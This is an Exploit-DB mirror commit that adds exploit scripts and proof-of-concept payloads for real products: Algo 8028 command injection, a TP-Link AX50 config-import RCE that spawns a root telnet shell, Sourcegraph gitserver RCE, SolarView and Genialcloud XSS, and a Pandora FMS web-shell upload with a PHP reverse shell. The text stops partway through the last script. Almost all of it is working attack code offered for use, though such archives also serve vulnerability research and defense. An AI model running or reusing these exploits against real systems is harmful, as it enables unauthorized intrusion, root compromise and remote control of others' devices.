bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-06-15

Browse source 
16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2022-06-15 05:01:57 +00:00
parent 5012842b97
commit 29e275db94
17 changed files with 1194 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

81
exploits/hardware/remote/50960.py Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:
# Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /
#!/usr/bin/env python3
import sys
import requests
cookie=None
def main():
# check if provided 3 args
if len(sys.argv) != 4:
print_help()
return
else:
host = sys.argv[1]
password = sys.argv[2]
command = sys.argv[3]
if login(host, password):
# if login was successful, send command
send_command(host, command)
def print_help():
print("Usage: algo.py 192.168.1.123 password command")
print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"")
def login(host, password):
url = f"http://{host}/index.lua"
data = {"pwd": password}
res = requests.post(url, data=data)
# check if html contains "Invalid Password"
if "Invalid Password" in res.text:
print("Invalid password")
return False
else:
# save cookie
global cookie
cookie = res.cookies
print("Successfully logged in\n")
return True
def send_command(host, command):
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"}
res = requests.post(url, data=data, cookies=cookie)
# get http://host/cmd.txt
url = f"http://{host}/a.txt"
res = requests.get(url)
# if "404 Not Found" in text then command was not executed
if "404 Not Found" in res.text:
print("Command was not executed (404)")
else:
print(res.text)
# delete cmd.txt
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"}
requests.post(url, data=data, cookies=cookie)
if __name__ == "__main__":
main()

295
exploits/hardware/remote/50962.py Executable file
View file

@ -0,0 +1,295 @@
# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tomas Melicher
# Technical Details: https://github.com/aaronsvk/CVE-2022-30075
# Date: 2022-06-08
# Vendor Homepage: https://www.tp-link.com/
# Tested On: Tp-Link Archer AX50
# Vulnerability Description: Remote Code Execution via importing malicious config file
# CVE: CVE-2022-30075
#!/usr/bin/python3
import argparse # pip install argparse
import requests # pip install requests
import binascii, base64, os, re, json, sys, time, math, random, hashlib
import tarfile, zlib
from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
from urllib.parse import urlencode
class WebClient(object):
def __init__(self, target, password):
self.target = target
self.password = password.encode('utf-8')
self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')
self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
self.stok = ''
self.session = requests.Session()
data = self.basic_request('/login?form=auth', {'operation':'read'})
if data['success'] != True:
print('[!] unsupported router')
return
self.sign_rsa_n = int(data['data']['key'][0], 16)
self.sign_rsa_e = int(data['data']['key'][1], 16)
self.seq = data['data']['seq']
data = self.basic_request('/login?form=keys', {'operation':'read'})
self.password_rsa_n = int(data['data']['password'][0], 16)
self.password_rsa_e = int(data['data']['password'][1], 16)
self.stok = self.login()
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext_padded, aes_block_size)
return plaintext
def rsa_encrypt(self, n, e, plaintext):
public_key = RSA.construct((n, e)).publickey()
encryptor = PKCS1_v1_5.new(public_key)
block_size = int(public_key.n.bit_length()/8) - 11
encrypted_text = ''
for i in range(0, len(plaintext), block_size):
encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()
return encrypted_text
def download_request(self, url, post_data):
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)
filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]
if os.path.exists(filepath):
print('[!] can\'t download, file "%s" already exists' % filepath)
return
with open(filepath, 'wb') as f:
for chunk in res.iter_content(chunk_size=4096):
f.write(chunk)
return filepath
def basic_request(self, url, post_data, files_data={}):
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)
return json.loads(res.content)
def encrypted_request(self, url, post_data):
serialized_data = urlencode(post_data)
encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))
encrypted_data = base64.b64encode(encrypted_data)
signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))
encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important
if(res.status_code != 200):
print('[!] url "%s" returned unexpected status code'%(url))
return
encrypted_data = json.loads(res.content)
encrypted_data = base64.b64decode(encrypted_data['data'])
data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)
return json.loads(data)
def login(self):
post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}
data = self.encrypted_request('/login?form=login', post_data)
if data['success'] != True:
print('[!] login failed')
return
print('[+] logged in, received token (stok): %s'%(data['data']['stok']))
return data['data']['stok']
class BackupParser(object):
def __init__(self, filepath):
self.encrypted_path = os.path.abspath(filepath)
self.decrypted_path = os.path.splitext(filepath)[0]
self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext_padded, aes_block_size)
return plaintext
def encrypt_config(self):
if not os.path.isdir(self.decrypted_path):
print('[!] invalid directory "%s"'%(self.decrypted_path))
return
# encrypt, compress each .xml using zlib and add them to tar archive
with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:
for filename in os.listdir(self.decrypted_path):
basename,ext = os.path.splitext(filename)
if ext == '.xml':
xml_path = '%s/%s'%(self.decrypted_path,filename)
bin_path = '%s/%s.bin'%(self.decrypted_path,basename)
with open(xml_path, 'rb') as f:
plaintext = f.read()
if len(plaintext) == 0:
f = open(bin_path, 'w')
f.close()
else:
compressed = zlib.compress(plaintext)
encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
with open(bin_path, 'wb') as f:
f.write(encrypted)
tar.add(bin_path, os.path.basename(bin_path))
os.unlink(bin_path)
# compress tar archive using zlib and encrypt
with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:
compressed = zlib.compress(f1.read()+f2.read())
encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
# write into final config file
with open('%s'%(self.encrypted_path), 'wb') as f:
f.write(encrypted)
os.unlink('%s/data.tar'%(self.decrypted_path))
def decrypt_config(self):
if not os.path.isfile(self.encrypted_path):
print('[!] invalid file "%s"'%(self.encrypted_path))
return
# decrypt and decompress config file
with open(self.encrypted_path, 'rb') as f:
decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())
decompressed = zlib.decompress(decrypted)
os.mkdir(self.decrypted_path)
# store decrypted data into files
with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:
f.write(decompressed[0:16])
with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:
f.write(decompressed[16:])
# untar second part of decrypted data
with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:
tar.extractall(path=self.decrypted_path)
# decrypt and decompress each .bin file from tar archive
for filename in os.listdir(self.decrypted_path):
basename,ext = os.path.splitext(filename)
if ext == '.bin':
bin_path = '%s/%s'%(self.decrypted_path,filename)
xml_path = '%s/%s.xml'%(self.decrypted_path,basename)
with open(bin_path, 'rb') as f:
ciphertext = f.read()
os.unlink(bin_path)
if len(ciphertext) == 0:
f = open(xml_path, 'w')
f.close()
continue
decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)
decompressed = zlib.decompress(decrypted)
with open(xml_path, 'wb') as f:
f.write(decompressed)
os.unlink('%s/data.tar'%(self.decrypted_path))
def modify_config(self, command):
xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)
if not os.path.isfile(xml_path):
print('[!] invalid file "%s"'%(xml_path))
return
with open(xml_path, 'r') as f:
xml_content = f.read()
# https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script
payload = '<service name="exploit">\n'
payload += '<enabled>on</enabled>\n'
payload += '<update_url>http://127.0.0.1/</update_url>\n'
payload += '<domain>x.example.org</domain>\n'
payload += '<username>X</username>\n'
payload += '<password>X</password>\n'
payload += '<ip_source>script</ip_source>\n'
payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))
payload += '<interface>internet</interface>\n' # not worked for other interfaces
payload += '<retry_interval>5</retry_interval>\n'
payload += '<retry_unit>seconds</retry_unit>\n'
payload += '<retry_times>3</retry_times>\n'
payload += '<check_interval>12</check_interval>\n'
payload += '<check_unit>hours</check_unit>\n'
payload += '<force_interval>30</force_interval>\n'
payload += '<force_unit>days</force_unit>\n'
payload += '</service>\n'
if '<service name="exploit">' in xml_content:
xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)
else:
xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)
with open(xml_path, 'w') as f:
f.write(xml_content)
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)
arg_parser.add_argument('-p', metavar='password', required=True)
arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')
arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')
arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')
args = arg_parser.parse_args()
client = WebClient(args.t, args.p)
parser = None
if not args.r:
print('[*] downloading config file ...')
filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})
if not filepath:
sys.exit(-1)
print('[*] decrypting config file "%s" ...'%(filepath))
parser = BackupParser(filepath)
parser.decrypt_config()
print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))
if not args.b and not args.r:
filepath = '%s_modified'%(parser.decrypted_path)
os.rename(parser.decrypted_path, filepath)
parser.decrypted_path = os.path.abspath(filepath)
parser.encrypted_path = '%s.bin'%(filepath)
parser.modify_config(args.c)
print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))
if not args.b:
if parser is None:
parser = BackupParser('%s.bin'%(args.r.rstrip('/')))
print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))
parser.encrypt_config()
data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})
timeout = data['data']['totaltime'] if data['success'] else 180
print('[*] uploading modified config file "%s"'%(parser.encrypted_path))
data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})
if not data['success']:
print('[!] unexpected response')
print(data)
sys.exit(-1)
print('[+] config file successfully uploaded')
print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

13
exploits/hardware/webapps/50967.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29299
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6

12
exploits/hardware/webapps/50968.txt Normal file
View file

@ -0,0 +1,12 @@
# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green

86
exploits/multiple/remote/50964.py Executable file
View file

@ -0,0 +1,86 @@
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3
# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph
import json
import argparse
import requests
def exploit(host, existing_git, cmd):
# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}
res = requests.get(host+"/exec", json=data).text
print("[*] Finished executing exploit")
parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()
host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd
exploit(host, existing_git, cmd)

46
exploits/multiple/webapps/50955.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296
Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.
Request parameters affected is "msg".
PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0
PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...

293
exploits/php/webapps/50961.py Executable file
View file

@ -0,0 +1,293 @@
# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/20/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
# Version: v7.0NG.742
# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)
# CVE: CVE-2020-5844
# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844
# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.
#!/usr/bin/env python3
# Imports
try:
import requests
except:
print(f"ERRORED: RUN: pip install requests")
exit()
import sys
import time
import urllib.parse
# Class for colors
class color:
red = '\033[91m'
gold = '\033[93m'
blue = '\033[36m'
green = '\033[92m'
no = '\033[0m'
# Print UNICORD ASCII Art
def UNICORD_ASCII():
print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")
# Print exploit help menu
def help():
print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
Usage:
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
Options:
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
""")
exit()
# Pretty loading wheel
def loading(spins):
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
for _ in range(spins):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b')
# Run the exploit
def exploit(exploitMode, targetSess):
UNICORD_ASCII()
# Print initial variables
print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")
print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")
if targetSess is not None:
print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")
elif targetUser is not None:
print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")
print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")
if exploitMode == "command":
print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")
if exploitMode == "web":
print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")
if exploitMode == "shell":
print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")
print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")
print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")
loading(15)
# If a PHPSESSID is not provided, grab one with valid username and password
if targetSess is None:
try:
getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})
targetSess = getSession.cookies.get('PHPSESSID')
print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")
if "login_move" in getSession.text:
print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")
except:
print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")
exit()
# Set headers, parameters, and cookies for post request
headers = {
'Host': f'{targetIP}',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',
'Content-Length': '1289',
'Connection': 'close',
'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
params = (
('sec', 'gsetup'),
('sec2', 'godmode/setup/file_manager')
)
cookies = {'PHPSESSID': targetSess}
# Basic PHP web shell with 'cmd' parameter
data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'
# Try to upload the PHP web shell to the server
try:
response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)
except:
print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")
exit()
statusCode=response.status_code
if statusCode == 200:
print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")
else:
print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")
exit()
loading(15)
print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")
loading(15)
# Print web shell location if in web shell mode
if exploitMode == "web":
print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")
print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")
# Run custom command on web shell if in command mode
if exploitMode == "command":
response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')
print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")
print(response.text)
# Run reverse shell command if in reverse shell mode
if exploitMode == "shell":
shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"
try:
requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)
print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")
except:
print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")
exit()
if __name__ == "__main__":
args = ['-h','-t','-u','-p','-s','-c','-w']
modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}
# Initialize starting variables
targetIP = None
targetPort = None
targetUser = None
targetPass = None
targetSess = None
command = None
localIP = None
localPort = None
webName = "unicord.php" # Default web shell file name
exploitMode = "web" # Default to web shell mode
# Print help if specified or if a target or authentication is not provided
if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):
help()
# Collect target IP and port from CLI
if args[1] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[1]) + 1]:
raise
targetIP = sys.argv[sys.argv.index(args[1]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[1]) + 2]:
raise
targetPort = sys.argv[sys.argv.index(args[1]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")
exit()
# Collect target username and password from CLI
if args[2] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[2]) + 1]:
raise
targetUser = sys.argv[sys.argv.index(args[2]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")
exit()
try:
if "-" in sys.argv[sys.argv.index(args[2]) + 2]:
raise
targetPass = sys.argv[sys.argv.index(args[2]) + 2]
except:
print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")
exit()
# Collect PHPSESSID from CLI, if specified
if args[3] in sys.argv:
try:
if "-" in sys.argv[sys.argv.index(args[3]) + 1]:
raise
targetSess = sys.argv[sys.argv.index(args[3]) + 1]
except:
print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")
exit()
# Set reverse shell mode from CLI, if specified
if args[4] in sys.argv:
exploitMode = "shell"
try:
if "-" in sys.argv[sys.argv.index(args[4]) + 1]:
raise
